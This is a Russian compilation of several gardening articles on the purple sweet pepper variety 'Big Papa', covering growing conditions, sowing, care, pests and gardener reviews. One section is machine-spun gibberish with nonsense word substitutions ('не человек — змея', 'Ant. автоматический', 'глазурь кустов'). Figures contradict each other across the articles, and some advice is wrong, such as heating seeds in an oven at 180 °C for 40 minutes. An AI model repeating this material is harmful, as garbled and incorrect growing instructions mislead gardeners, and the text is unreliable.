2 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Сладкий перец биг папа

Сладкий перец Биг папа

Перец Биг Папа выделяется из всех сортов уникальной окраской. Он отлично подходит для выращивания в средней полосе России, благодаря неприхотливости и устойчивости к болезням.

Сладкий перец Биг папа

Характеристика сорта

Биг папа — низкорослый сорт, он достигает в высоту не более 0,5 м. Листва растения имеет легкий фиолетовый оттенок. Соцветия на стадии цветения синие. Урожайность овощной культуры при соблюдении правил агротехники насчитывает около 6,5-7,0 кг с 1 кв. м посадочной площади. Обычно на 1 перцевом кусте появляется больше 10 овощей.

Перец Биг папа отлично подходит для употребления в свежем виде и в консервации.

Овощи, согласно описанию, вырастают конусовидной формы и на стадии технической зрелости имеют характерный фиолетовый цвет, к моменту биологического созревания становятся яркими темно-вишневыми. У плодов, вес которых достигает порядка 90-120 г, толщина стенок составляет 5-7 мм.

Подходящий климат

Наиболее подходящими условиями для выращивания разновидности Биг папа является средняя полоса, начиная от восточной части и проходящая через всю восточно-европейскую равнину. Подходит для этой овощной культуры также и Поволжье.

При выращивании перца в северных регионах, где температура летом не поднимается выше 15-20°С, при культивировании овощной культуры требуется укрытие для создания дополнительного тепла.

Лучше всего Биг папа растет в областях Поволжья, в особенности в черноземной почве. В таких условиях дополнительное укрытье для перца не требуется.

В местностях с жарким климатом требуется обеспечить защиту перцевых кустов от ожогов листьев. В таких условиях требуется устанавливать затенение либо высаживать перцы в местах, где нет прямого попадания солнечных лучей. В южных регионах, где рано темнеет и длительность светового дня сокращена, иногда приходится прибегать к дополнительному освещению, чтобы световой день был не менее 12 часов.

Требования к почве

В средней полосе, имеющей преимущественно глинистые почвенные грунты, при выращивании сорта Биг папа прибегают к минеральной подкормке. Во влажные дождливые периоды, когда глинистая земля расползается, ее укрепляют при помощи внесения песка.

Песчаный грунт для питательности разбавляют черноземом либо лиственным перегноем. Оптимальное соотношение всех частей почвы: глины, песка и удобрений — в равных долях.

Посадка и уход

Правильный уход принесет свои плоды

Считается, что оптимальным сроком посадки семян перца Биг папа является период с конца января по конец февраля. Первоначально семена рекомендуют высаживать на рассаду в домашних условиях, поддерживая температуру 26-28°С, погружая семенной материал на глубину 3-4 см. Всхожесть семян, приобретенных у надежного производителя, отличается высокими показателями и достигает 80-90%.

Пересадка

Выращенная рассада пересаживается через 70-75 суток после прорастания семян. Предрасположенные к стрессам саженцы сорта Биг папа при пересадке обрабатывают Эпином.

На 1 кв. м посевной площади высаживают не более 5-6 саженцев.

Средний срок созревания плодов сорта перца Биг папа составляет 95-105 суток с момента посадки. Обычно это время выпадает на май.

При уходе за перцем Биг папа важно соблюдать основные принципы полива, удобрения и температурного режима.

Вносить удобрения рекомендуют с интервалом в 1,5-2 недели, что дает возможность вырастить крупные овощи. При подкармливании стоит придерживаться рекомендуемых нормативов, чтобы перекормленные перцы не стали водянистыми и не утратили вкусовые качества.

Преимущества и недостатки

Сладкий сорт Биг папа — выгодная овощная культура, которая подходит для большого фермерского хозяйства и для выращивания в условиях приусадебного участка. Среди положительных характеристик перца отмечают:

  • его устойчивость к пониженным температурам,
  • высокие показатели урожайности,
  • способность адаптироваться под местные условия,
  • неприхотливость в уходе, отсутствие необходимости в подвязке,
  • ранние сроки созревания.

Перец Биг папа: описание сорта, фото, отзывы

Сладкий перец Биг папа будет интересен огородникам, предпочитающим скороспелые сорта с плодами экзотической окраски. Первый урожай с момента появления всходов растения отдают спустя 96-104 дня. Сорт ценится за стабильную урожайность, высокие вкусовые качества, болезнеустойчивость и универсальность использования в кулинарии.

Описание и характеристика сорта

Сладкий сорт перца Биг папа подходит для культивирования как под пленочными укрытиями, так и на грядках под открытым небом.

У растения раскидистый куст, доходящий в высоту в условиях теплицы до 1 метра. В открытом грунте стебель не вырастает более чем на 0,5-0,6 м.

Одно растение способно приносить до 30 плодов конусовидной формы. Каждый куст буквально усыпан перцами, которые, согласно описанию производителя, должны смотреть носиком вверх.

Плоды Биг папы среднего размера, но очень толстостенные. Весит один перец от 80 до 120 гр. Толщина перикарпия варьируется в пределах 6-8 мм.

При технической спелости кожура у перцев фиолетовая. Как только наступает биологическая зрелость плоды приобретают темно-вишнёвый или баклажановый оттенок (см. фото).

В среднем с 1 кв. м. можно собрать до 6 кг овощей в закрытом грунте при соблюдений агротехнических правил культивирования.

У перца вкус сладкий, сочный с перечным ароматом. Плоды красиво смотрятся в свежих салатах. Также их фаршируют, консервируют, используют для приготовления вторых блюд.

Особенности выращивания и ухода

На рассаду семена сорта Биг папа производитель ориентировочно рекомендует высаживать в последней декаде февраля при выращивании в теплицах и в начале марта − при условии культивирования на огороде. Всходы после посева ориентировочно проклевываются спустя 7-15 дней.

Пикировку проводят, как только у сеянцев появится по одному настоящему листочку. К «переезду» на постоянное место сеянцы должны достичь 70-дневного возраста. Высаживают кусты по схеме 50 см (междурядье) на 35 см (расстояние между кустами в ряду).

Раскидистый куст с обильным количеством плодов требует обязательной подвязки. В качестве опоры производитель рекомендует использовать шпалеру.

Растения формируют в два стебля. Обязательно удаляют «коронный» цветок для получения более богатого урожая и крупных плодов.

Уход за перцем Биг папа сводится к традиционным агротехническим правилам: поливают теплой, отстоявшейся водой, проводят регулярные прополки и рыхление или мульчирование, вносят до 3 раз за сезон минеральные удобрения или органику с повышенным содержанием фосфора, азота и калия.

Болезни и вредители

В характеристике сорта указано, что перец сладкий Биг папа имеет хороший иммунитет к заболеваниям пасленовых. Однако в качестве профилактики все же рекомендуется соблюдать севооборот, своевременно удалять сорняки, нижние листики и пасынки для проветривания кустов.

Перцы необходимо регулярно осматривать на наличие таких вредителей, как паутинный клещ, слизни, белокрылка, проволочник, тля и др. При первых признаках поражения растения подвергают обработке инсектицидами или аккарицидами в зависимости от вида обнаруженного фитофага.

Достоинства и недостатки

Согласно отзывам огородников и описанию сорта у «Большого папы» можно выделить следующие достоинства:

  • стабильная и высокая урожайность при правильной агротехнике;
  • красивые с необычным цветом и хорошим вкусом плоды;
  • ранний урожай, как в открытом, так и закрытом грунте;
  • генетическая устойчивость к болезням пасленовых;
  • универсальность в кулинарном применении.

К недостаткам Биг папы относят невозможность долгого хранения плодов в свежем виде, которые быстро теряют форму, а соответственно и товарный вид. К минусам некоторые огородники также относят некоторые сложности при выращивании, связанные с подвязкой и формированием кустов.

Другие сорта серии «Биг»

В линейке «Биг» агрофирмы Аэлита имеются и другие сорта помимо «Большого папы»:

  • Биг мама. У овощеводов этот сорт завоевал наибольшую популярность среди представителей серии «большой». Особенностью культивара являются ярко-оранжевые кубовидные плоды, которые действительно очень крупные и толстостенные. Масса одного перца доходит до 200 гр. Период от всходов до сбора урожая составляет в среднем 110 суток. При культивировании в тепличных условиях с квадратного метра можно собрать до 10 кг урожая. А вот при выращивании на открытых грядках на урожайность более чем 4 кг. с кв. м. рассчитывать не стоит. Растение относится к высокорослым (до 1,7 м), поэтому требует обязательного подвязывания. Сорт отличается хорошей устойчивостью к температурным перепадам. Он показал отличную завязываемость даже в холодную погоду.
  • Биг герл. Этот сорт сладкого перца имеет во многом схожие характеристики с предыдущим. Первые плоды достигают молочной зрелости спустя 110 дней. При полном вызревании перцы оранжевые, имеют кубовидную форму, большие, весом до 200 гр. При выполнении всех агротехнических правил культивирования огородник может рассчитывать на 6 кг овощей с кв. м. Плоды сочные, вкусные, отличатся толстой кожурой и хорошей лёжкостью.
  • Биг бой. Раннеспелый перец, отдающий урожай после появления всходов, через 105 дней. Кусты овощной культуры среднего размера (0,8 м), полураскидистые. Сроки высадки в грунт у всех представителей «биг» примерно одинаковые: приходятся на середину мая − начало июня. При культивировании в теплице высаживать перцы можно раньше. Урожайность сорта доходит до 7,5 кг с кв. м. при схеме высадки 50 на 35 см. Биологически спелые перцы обретают красный окрас. По форме плоды прямоугольные или трапециевидные, очень толстостенные и крупные, до 280 гр. Культивар предназначен для выращиванияв теплицах.

Отзывы огородников

«Выращивала Биг папу на подоконнике один сезон. Полностью разочарована в сорте. Перцы получились мелкие, декоративные, правда кусты были полностью ими усыпаны. Возможно для выращивания в домашних условиях он просто не подходит. Из тех перцев, что сажала дома, мне больше всего понравился Винни пух. Сорт неприхотлив, отдает достаточно крупные плоды, да и на вкус хорош».

«Сажаю Биг папу несколько сезонов к ряду. Нравится этот перец прежде всего за раннее созревание и отличные вкусовые качества. Плоды очень сочные, хороши в салатах. Сорт урожайный, но с некрупными перцами. Поэтому странно, что производитель дал такое ему название».

«Первое, чем привлек меня Биг папа, так это красивыми необычного цвета плодами. Перец очень хорошо и быстро всходит по сравнению с другими сортами. Выращиваю в открытом грунте. Перец ни разу ничем не болел. Урожай отдает дружно, поспевает раньше других моих скороспелых сортов».

«Сорт непривередливый в уходе, ничем не болеет. Первые плоды снимаю уже в июле. Перцы сочные и достаточно сладкие, мякоть очень нежная. Особенно нравятся они мне в свежих салатах».

Биг папа не отличается высокой популярностью у огородников. Некоторых не устраивает размер плодов, другие недовольны непродолжительной лежкостью, третьи все же предпочитают сорта перцев традиционного окраса. Несмотря на это часть овощеводов, знакомых с Биг папой из года в год продолжат культивировать его на своих участках, благодаря раннеспелости, высоким вкусовым качествам, болезнеустойчивости и неприхотливости в уходе.

Перец Биг папа — описание и характеристика сорта

Основные характеристики сорта

Биг Родитель относится к категории раннеспелых сортов, период полного созревания составляет 100-120 дней, в зависимости через климатических условий. Есть ряд признаков, по которым можно фиксировать данный вид перца:

  1. Сорт относится к разряду низкорослого, максимальная высь растения составляет 50 см.
  2. Листва крупная, раскидистая темно-зеленого цвета с фиолетовым отливом.
  3. Соцветия окрашены в совершенный синий цвет.
  4. Плоды имеют конусовидную форму с толстыми мясистыми стенками рука об руку 7 мм, вес отдельного овоща достигает до 120 г.
  5. Цвет меняется ото фиолетового до насыщенного бордового оттенка, в зависимости от периода созревания. Внутренняя копра плода белого цвета.

Урожайность сорта считается достаточно высокой и составляет практически 7 кг на 1 кв.м. при условии соблюдения основных правил выращивания данной культуры. Исполнение) понимания: на одном кусте формируется 10-14 плодов.

Рекомендации соответственно выращиванию рассады и уходу

Придерживаясь нескольких простых правил по выращиванию и уходу вслед растением, можно добиться отличных результатов в виде хорошего урожая вкусных овощей. Рекомендации сообразно посадке:

  1. Перец Биг Папа выращивается с семян, которые помещаются в отдельные горшочки али в особые кассеты, как правило, из пластмассовых материалов. Лучшее период для посадки считается начало года, а конкретно — январь-февраль.
  2. В начале мовра нужно выращивать в рассаду в домашних условиях, погружая в грунт на глубину 2-3 см. Разве семена надлежащего качества, то всхожесть составляет в среднем не меньше 85%, что является высоким показателем сельскохозяйственной культуры.
  3. Температура в помещении, идеже находится рассада, должна поддерживаться в пределах +25 градусов днем, и неважный (=маловажный) опускаться ниже +18 в ночное время суток.
  4. Данный сорт относится к категории светолюбивых растений, (вследствие нужно проследить за регулярным попаданием солнечных лучей.
  5. Поливать не человек — змея нужно 1 раз в неделю, данному сорту этого вполне достаточно для того оптимального роста. При поливе используется только теплая вода комнатной температуры. Исполнившееся полива приходится на вечер — для того, чтобы автохор максимально насыщалось влагой, без лишнего испарения, которое неизменно происходит рядом солнечном времени.

Уход за растением очень важен на первых этапах — через выращивания рассады из правильно подобранных семян до выбора почвы и эффективной подкормки в фазис роста и созревания перца.

Пересадка рассады и требования к почве

Рассада говорят полностью выращенной для пересадки спустя 75 суток, после прорастания семян, к этому времени сделано должна быть подготовленная почва. Если саженцы выглядят не вполне окрепшими, их обрабатывают специальным средством Эпином, так часто делают и к подстраховки при первом опыте выращивания данного сорта. Так вроде растения обладают объемной листвой, рекомендуют высаживать кусты из расчета 5-6 единиц нате 1 кв.м. Для разной почвы применяют соответствующий уход:

  1. Благо почва для выращивания перца имеет глинистую структуру, лучше обратиться к минеральным удобрениям растения. В период повышенной влажности, в сезоны дождей — в такую почву добавляют песочек для уплотнения ее структуры. Это предотвращает расползание земли и заголение корней.
  2. При посадке в песчаный грунт, рекомендуется добавление плодородного чернозема али удобрения с перегнившей листвой.
  3. Почва должна быть все время рыхлой. Сие позволяет насыщать корни кислородом.
  4. Следует внимательно следить за появлением различных сорняков, которые забивают саженцы перца, вбирая питательные вещества с удобрения и поливов.
  5. Начинать подкормку можно сразу после появления первых листков. В последствии унаваживать рекомендуется с перерывом в 2 недели, можно и чаще — в зависимости от выбранного полей). Такая система позволит вырастить крупные мясистые плоды.

Оптимальный стаж созревания этого сорта — 100-105 суток с момента посадки рассады.

Война с болезнями и вредителями

Сорт перца Биг Папа считается устойчивой к болезням культурой, же это совсем не значит, что не нужно проводить профилактических действий вперерез инфекций грибка, которые грозят опасными для плода урожаями. Самые распространенные «враги» хорошего урожая — сие:

  1. Вершинная гниль, главная причина появления этого заболевания — неисправность кальция и большой процент азота. Чаще всего это происходит изо-за слишком частой подкормки растения, поэтому в этом нужно особенно оберегать меру, придерживаясь рекомендаций по дозировке удобрений. Первые признаки заражения проявляются в самих плодах, их кончики покрываются коричневыми пятнами. Для лечения рекомендуется пустить в ход селитру с высоким содержанием кальция.
  2. Опасна для роста растения и в) такой степени называемая мозаика перцев, она замедляет развитие и рост перца. Установить можно по изменению формы плода и цвета листвы. Для предотвращения заболевания надобно проводить регулярную профилактику почвы, обработку семян непосредственно перед посадкой.

Мирово! Регулярная обработка инвентаря и конструкций теплицы — важный момент в борьбе с инфекциями и паразитами. Годится для этого раствор марганцовки, который легко сделать в домашних условиях.

Самые опасные вредители перца — сие тля, клещи и слизни. При появлении насекомых или их личинок, кусты опрыскивают вдоль 2 раза в неделю. Действенное средство — раствор с настойками чеснока и полыни. Сложение в почву кофе, сухой горчицы и извести помогает нейтрализовать слизней, и в ход идут специальные ловушки, которые можно приобрести в садоводческих магазинах или — или заказать в интернете. Хорошо помогает высадка ноготков в ряду с перцами. К борьбы с личинками, которые полностью уничтожают корни растения, следует отправлять глубокую перекопку земли до высадки, при необходимости выбирая всех личинок ручным способом. Ant. автоматический.

Иногда «ложные» признаки болезни появляются от слишком обильного глазурь кустов. Снизив дозу увлажнения, можно убедиться, что с растением весь век в порядке, и оно быстро возвращается в форму.

Подходящий климат

Данный марка перца не капризный к воздействиям окружающей среды, но, зная, который климат наиболее благоприятный для хорошего роста и созревания, получится сорвать лучших результатов. Данный сорт прекрасно растет в средней полосе с умеренными климатическими условиями.

В случае если высадка происходит в более северных регионах, то только при наличии тепличных сооружений с поддержанием необходимой температуры. И нужно позаботиться о дополнительном освещении, если отсутствует природное, ведь пимент — очень светолюбивая культура, и для правильного роста растения ну что ж обилие солнечного света.

Достоинства и недостатки сорта

  1. Уже созревание, а значит — есть возможность снятия двойного урожая.
  2. Рассчитанный на эффект фиолетовый цвет. Перец радует глаз красивым и необычным цветом паки (и паки) на этапе созревания, а в массе это выглядит очень привлекательно.
  3. Возделывание считается неприхотливой в уходе, достаточно соблюдать несколько основных правил в целях получения хорошего урожая.
  4. Кусты аккуратные и невысокие, а значит — маловыгодный требуют подвязки.
  5. Высокая урожайность, на одном кусте появляются 10-12 плодов.
  6. В ажуре адаптируется под условия местности при правильном уходе.

Среди отрицательных свойств перца наблюдаются:

  • несносность жары;
  • не очень крупные плоды;
  • не любит частые пересадки, подвержен стрессам изменения почвы.

Нужда Биг Папы несущественны по сравнению с преимуществом этого сорта, и могут нивелироваться из-за счет правил по уходу за растением.

Правила хранения и мороз продукта

Перец Биг Папа подходит для приготовления различных блюд, самые традиционные изо которых — это лечо, фаршированные перец, разные салаты, а равно как консервация. В последнее время распространен метод заморозки перца для использования в зимний стадия, когда его стоимость особенно высока.

В домашних условиях хранить кустарник рекомендуется на балконе или веранде, утепленных на зиму. Во (избежание хранения используют деревянные ящики, в которые складывают овощи, предварительно упаковав их в бумагу неужто полиэтиленовые пакеты. Для притока воздуха делаются небольшие отверстия, си перец не будет увядать. Место должно быть защищенным через попадания прямых солнечных лучей.

Выбирать для заморозки нужно с головы до ног вызревшие плоды – те, что имеют бордовую окраску. Перец далеко не срывается, а аккуратно срезывается ножом, сохраняя плодоножку. Плоды проверяются получай повреждения и обрабатываются слабым 1% раствором медного купороса, затем протираются бумажным полотенцем. С целью заморозки подходят как отдельные емкости, так и пакеты. Замораживать есть перец целиком и в порезанном виде.

Специалисты в высаживании сладкого перца сходятся закачаешься мнении, что сорт Биг Папа — это выгодная уровень культуры и подходит как для промышленного хозяйства, так и для домашнего использования. Пимент дает обильный урожай вкусных плодов, насыщенного фиолетового цвета.

Видео: соль сорта Биг папа

Перец «Биг папа»: характеристика и описание сорта (фото)

Биг Папа» нестандартный сладкий перец, обладающий фиолетовым или вишневым окрасом плодов. Он хорошо растет в средней полосе, не боится болезней.

Культура выращивается в коммерческих фермерских хозяйствах и частных огородах.

Общие характеристики

«Биг Папа» — раннеспелый перец. Он приносит плоды уже через 100 дней — это один из минимальных вегетативных сроков среди сортов сладких перцев.

Растение вырастает невысоким. Кустики достигают не более 50 см и не требуют подвязки или установки подпорок. Это несомненный плюс — участок выглядит менее загруженным, перец не загораживает солнце для растущих рядом низких трав и растений. В целом сорт неприхотливый. Благодаря этому качеству его используют в детских озеленительных кружках: даже дети могут дать растению достаточно ухода для цветения и урожая.

Культура подходит для выращивания под пленкой или в открытых условиях, однако, открыто выращивать растение можно только в южных районах страны.

Как и другие перцы, растение выращивается в два этапа: сначала высаживается рассада, затем она помещается в основную почву, заранее подготовленную или укрытую низким тентом. Урожайность сорта очень высокая. Подробнее о плодах можно узнать ниже.

Выращивание в России

«Биг папа» подходит для средней полосы (Восток России — Восточно-Европейской равнина), а также Поволжья, где температурные условия более благоприятные. На Севере, в том числе и в районах с прохладным летом (с температурами 15-20 градусов), необходимо использовать утрасил или другую пленку для поддержания тепла. Лучше поместить культуру в теплицу. В Поволжье, особенно в районах с черноземными почвами, перец растет лучше всего. Он не требует дополнительных укрытий.

В Калининграде, Севастополе, других участках с жарким летом нужно обеспечить защиту от ожогов листвы. Чтобы та листики не пожухли из-за постоянного воздействия ультрафиолета, рекомендуется установить затенение или сажать культуру там, где солнце напрямую светит не весь день. Не стоит увлажнять растение во время зноя крупной струей воды: это не только может привести к поломке стебелька, но и усилит ожог. Крупные капли работают как призма и усиливают воздействие солнца.

Так как глинистые почвы средней полосы недостаточно питательны для сладкого перца, при посадке в открытый грунт обязательно нужно производить подкормку. Если глинистая почва во влажный период слишком расползается, добавляется треть песка; а песчаную землю рекомендуется добавлять чернозем или бурую почву — результат перегноя листвы.

«Биг Папа» — распространенная фермерская культура, что говорит о его высокой урожайности в российских условиях. Однако для хорошей урожайности нужно соблюдать все правила агротехники.

Особенности ухода

Растение неприхотливое. Для поддержания нормального состояния достаточно проводить базовые процедуры — удобрение, полив, увлажнение, поддержание температурного режима. Перец болезнеустойчив, но плохо переносит стресс. Поэтому при резком снижении температуры, пересадке или других стрессовых для растения событиях нужно опрыскивать стебельки и листья «Эприном».

Можно окучивать куст, чтобы он был защищен от вредителей (слизни, мыши, улитки). Рекомендуется удалять сорняки и траву с почвы рядом с культурой. Это поможет увеличить приток питания к овощу.

Сроки высадки

Четких сроков высадки у растения нет. Но оптимально сеять его вместе с остальными раннеспелыми плодами — в конце января или в течение февраля. Если метеорологи прогнозируют плохую погоду в начале лета, посев можно задержать до конца февраля.

Сначала семена нужно вырастить в домашних условиях. Оптимальная температура — от 26 до 28 градусов. Семечко нужно погрузить на глубину 3-4 см. Если фирма семян проверенная, достаточно сажать одно семечко-риск «мертвого» семя минимальный. Но если у вас есть сомнения, лучше поместить в один горшочек по два зернышка.

Сроки созревания и характеристики плодов

Факт: Вегетативный цикл зависит от времени посева. Если вы высадите зернышки в позднее время, уже весной, то кустик не даст урожай так рано, как было заявлено производителем. Плодоносить кустик начинает обильно после короткого красивого цветения. На одном кустике появляется более десятка плодов. Обязательно нужно подрезать нижние листики, чтобы они не «тянули» питательные вещества.

Перец считается биологически зрелым, когда приобретает темно-вишневый оттенок. Снять плоды и отправить их на техническое дозревание или хранение можно, когда перец приобретет фиолетовый оттенок.

Устойчивость к болезням

Растение не подвержено болезням, а в случае заболевания (что происходит редко) быстро выздоравливает.

При правильном уходе и использовании подкормок саженцы не должны покрываться черными точками, желтыми и коричневыми пятнами от солнечных ожогов. Если начали загнивать стебельки или корешки, необходимо снизить уровень влажности в помещении или почве. Интересно: «Биг папа» можно не обрабатывать защитными составами, потому что у него хороший иммунитет. Это позволяет увеличить количество витаминов в плоде и сделать блюда более безопасными для аллергиков и детей.

Применение растения

Плоды «Биг папы» обладают высокими вкусовыми качествами. Они не приторные, но и не горькие. Отсутствует кислинка, поэтому такой сорт можно использовать для любых блюд, в том числе свежих салатов.

Из перчиков можно сделать лечо, основу для фаршированного блюда, салат, блюдо-гриль, запечь на костре. Нашинкованные или тонко нарезанные колечки хорошо дополняют свежие летние бутерброды. Можно использовать колечки для украшения тарелки.

Во время цветения на стебельках появляются красивые небольшие синие цветы. Поэтому ростки можно высаживать на видном месте — во время цветения они привлекают внимание соцветиями, а во время созревания — необычными плодами с фиолетовым оттенком стенок. Листья на кустиках крупные, с синеватым оттенком. Если растение получало достаточно питания, особенно будет заметна синева на кончиках.

Преимущества и недостатки сорта

Положительные стороны сорта:

  • не гибнет при похолоданиях;
  • обладает высокой урожайностью;
  • хорошо адаптирован под российские условия;
  • раннеспелый;
  • неприхотлив;
  • невысокий, не требует подвязки. Отрицательные характеристики:
  • подвержен стрессам и в редких случаях может погибнуть;
  • при пересадке может на некоторое время остановиться в росте, что, однако, не сказывается на урожайности;
  • плоды относительно других сортов небольшие.

Отзывы огородников

Кирилл Петрович, 72 года. г. Кропоткин:

«Выращиваю перцы на продажу с тех пор, как нашел сорт «Биг папа» на рынке. До него перцы не шли — гибли или давали плохой урожай, потому что регион северный и летом на улице только +18. Но «Биг папа» стабильно приносит 20 кг перца с небольшой грядки 4 метра длиной. Его хорошо покупают, советуют сорт знакомым. Каждый год распродаю весь урожай за пару дней».

Инга Ивановна, 52 года. с. Левокумское, Нефтекумского района, Ставропольского края:

«Не смыслю в садоводстве, поэтому многие культуры раньше гибли. С «Биг папой» же все пошло хорошо. Выращивала его ради летнего лечо. Несмотря на то что забывала иногда удобрять и даже поливать, урожай кустики дали. И лечо получилось отменное. Только для салата я бы рекомендовала красные сорта, а не этот».

Иван Александрович, 41 год. г. Новошахтинск, Ростовской области:

«Ежегодно выращиваю что-нибудь, чтобы были собственные овощи на зиму. «Биг папа» оказался очень удобен: высадил в конце весны, подкормил, уехал. Приезжал на дачу, на выходные и поливал, укрывал — ничего, растение от недостатка влаги или холода не страдало. Уже летом начало давать плоды. Немного горчит, но, может, дело в недостатке удобрений.

Кустики продаются в нескольких вариантах. Их можно найти у самых популярных садоводческих фирм. Неприхотливость, низкая стоимость семян, хорошая урожайность делают сорт особенно привлекательным. На «Биг папе» стоит остановить свой выбор людям с небольшим количеством времени для ухода за садом и тем, кто хочет получить урожай с минимумом затрат».

Необычный сорт с фиолетовыми плодами — перец «Биг папа» и нюансы его выращивания

Перец Биг папа привлекает огородников оригинальным внешним видом: глянцевые фиолетовые плоды красиво выглядят и украшают любой обеденный стол. Овощ богат витаминами А и С, универсален в применении и долго хранится, поэтому вырастить на своем участке болгарский перчик Биг папа мечтают многие.

В статье рассмотрим, как получить богатый урожай и узнаем секреты выращивания этого сорта.

Что это за сорт перца

Биг папа подходит для выращивания в средней полосе России. Сажают перчик как в открытые грядки, так и под пленочные укрытия. В уходе неприхотлив, отличается высокой и стабильной урожайностью.

Характеристики и описание сорта

Кустики сорта низкорослые, максимальная высота 0,5 м. Листья небольшие, округлые, с небольшим фиолетовым отливом. Сорт раннеспелый, созревает за 90—100 дней с момента посадки.

Характеристика плодов и урожайность

Плоды небольшие, конусовидные. Вес овоща варьируется от 100 до 120 г, диаметр около 10—15 см. Стенки средней толщины 5—7 мм. Окрас темно-вишневый, кожура гладкая. Мякоть отличается сочностью и сладким вкусом, поэтому перчик активно используют в кулинарии. При правильном уходе огородники с 1 кв. м собирают около 7 кг вкусных и красивых плодов.

Интересно! В 100 г болгарского перца содержится всего 25 ккал. Овощ богат клетчаткой, йодом, фтором и железом. Витамины группы В, которые в большом количестве содержатся в сладком перце, помогают бороться со стрессом, служат профилактикой бессонницы, снимают усталость. Витамины Р и С укрепляют стенки сосудов и активизируют работу печени.

Подготовка к выращиванию

Подготовка к выращиванию болгарского перца Биг папа состоит из нескольких процедур. Рассмотрим каждую подробно:

  1. Подготовка семян. Рекомендуется приобретать семена только в проверенных магазинах, обращая внимание на срок годности материала и целостность упаковки. Семена обеззараживают в домашних условиях с помощью прогревания: помещают их на противень и убирают в духовой шкаф на 40 минут при температуре 180 °С. Еще один способ дезинфекции — замачивание в растворе янтарной или борной кислоты. Дезинфекция уничтожает патогенную микрофлору на поверхности семян и защищает семенной материал от болезней.
  2. Подготовка грядок в огороде. Перец предпочитает солнечные и рыхлые грядки. В конце октября землю тщательно перекапывают, избавляясь от мусора и остатков растений. Подкармливают торфом или перегноем, на 1 кв. м расходуют 1,5 л удобрения. С приходом весны почву перекапывают вновь, избавляясь от листвы и крупных комков. Грядки разравнивают граблями, поливают настоем жидкого коровяка.

Лучшие предшественники для посадки перца — лук, зелень или бобовые культуры. Не рекомендуется высаживать перчики после томатов или картофеля. Соблюдение правил севооборота предотвращает появление сорняков и вредителей.

Выращивание рассады

Рассадный способ ускоряет адаптацию к неблагоприятным погодным условиям. Подготавливают ее за 50 дней до высадки семян в грунт.

Посадка перца

Высаживают перец в любой удобной емкости. Это могут быть обрезанные пластиковые бутылки, плотные пакеты и даже яичная скорлупа. Отличная емкость для перца Биг папа — рассадные ящики с дренажными отверстиями. Изготовлены они из дерева или пластика. В магазине нетрудно подобрать размер ящика, который подходит для определенного подоконника. Ухаживать за ростками в ящике удобно, все саженцы находятся рядом. При необходимости все перчики переносят в другое место. Рекомендуемая высота ящика — не менее 8 см.

Расстояние между саженцами должно быть не менее 7 см. В почве с помощью карандаша проделывают небольшие бороздки глубиной 1 см. В каждую ямку помещают по 2-3 продезинфицированных семени, сверху присыпают землей и поливают теплой водой. Для создания эффекта парника рассаду накрывают полиэтиленом или тонким стеклом. Убирают укрытие через 2 недели, когда появятся первые ростки.

Уход за рассадой

Рассада сладкого перца нуждается в тепле и солнечном свете, поэтому лучшее место для нее — подоконник. Уход состоит из своевременных поливов и удобрений. Поливают рассаду один раз в пять дней, рекомендуется использовать теплую воду из фильтра.

Холодная вода из-под крана повышает риск размножения опасных микробов. Удобряют перцы через 15 дней с момента посадки. Первая подкормка это жидкая органика, например, птичий помет или коровяк. Следующий раз подкармливают саженцы еще через две недели. Для ускорения роста применяют стимуляторы — препараты «Корневин» или «Гетероауксин».

Важно! Если рассада растет в небольших стаканчиках или горшочках, через две недели с момента посадки ее пикируют, то есть высаживают в емкость побольше. Пикировка дает корням больше места для роста и развития. В тару с землей аккуратно помещают ростки, присыпают со всех сторон и прихлопывают.

Посадка в огород и дальнейший уход

За 10 дней до высадки в огород сокращают число поливов, а за неделю полностью прекращают. Понять, что перцы готовы к высадке, можно по характерному признаку: у ростков появляются по 8—11 листьев и развитые цветки. Лучшее время для процедуры — раннее утро или вечер, когда нет солнца. Оптимальное расстояние между кустиками 50 см — загущенная посадка приведет к развитию болезней. Рассаду обильно поливают, каждый кустик аккуратно вынимают из емкости и помещают в подготовленную лунку.

В основе любого ухода за растением лежит регулярный и правильный полив. Температура воды должна быть не менее +20 °С, увлажняют грядки один раз в 5—7 дней. На один кустик расходуют около 1,5 л воды. Струю направляют прямо под корень, минуя стебли и листья. Это защищает кустики от грибков и вирусов. Некоторые дачники устанавливают у себя на участке капельную систему орошения. Она удобна тем, что вода попадает прямо в корневую систему, при этом расход влаги в разы меньше, нежели при ручном поливе.

Вырастить богатый урожай невозможно без своевременных подкормок и удобрений. Проводят процедуру через две недели после высадки и далее с интервалом 2-3 недели.

Для удобрения перца Биг папа используют:

  • раствор на основе сухой древесной золы;
  • жидкий коровяк, мочевину, птичий помет;
  • аммиачную селитру;
  • суперфосфат.

Особенности выращивания и возможные трудности

Выращивание в теплице имеет свои правила. Перед высадкой стенки конструкции протирают раствором на основе марганцовки, чтобы уничтожить опасных микробов. Формировать растение начинают сразу, как только стебли разветвятся. Оставляют только мощные и сильные, а слабые удаляют.

Рекомендуется следить и за количеством вносимых подкормок. Если листья приобрели желтый оттенок и стали сухими, значит, огородник вносил слишком много минеральных удобрений. Если растение набирает рост и зеленную массу, но не цветет, это говорит о переизбытке азота; сухие и слабые стебли — переизбыток фосфора. Исправить ситуацию поможет обильный полив теплой водой и припудривания кустиков древесной золой.

Характерные болезни и вредители

При несоблюдении правил севооборота на грядках с перцем появляется проволочник. Вредитель живет под землей, питается корнями растения, из-за чего оно останавливается в росте. Если вовремя не предпринять меры, то сам куст начинает вянуть, а плоды деформироваться. Избавиться от толстого червяка коричневого цвета помогают профессиональные средства «Максим» или «Оксихом».

Помимо проволочника, на перец негативно влияют:

  1. Колорадские жуки, причина появления которых кроется в зараженной почве. Жуки и их личинки способны уничтожить весь урожай. Избавляются от них при помощи препарата «Тайфун».
  2. Трипсы появляются еще на этапе формирования кустов. Питаются соком и нектаром растения, лишая их питательных веществ для дальнейшего развития. Для профилактики опрыскивают бордоской жидкостью.
  3. Белокрылки — миниатюрные белые мошки — собираются на листьях целыми стаями. В борьбе с белокрылкой помогают опрыскивания на основе молока и йода.

Особую опасность представляет фитофтороз. Грибок появляется из-за чрезмерной жары, перепадов температур, неправильного полива. Проявляется фитофтороз в виде желтых и бурых пятнен на листьях и стебле. Опасен грибок как для открытого грунта, так и для теплиц. В борьбе с фитофторозом применяют опрыскивания марганцем или поливы водой с древесной золой.

Преимущества и недостатки сорта

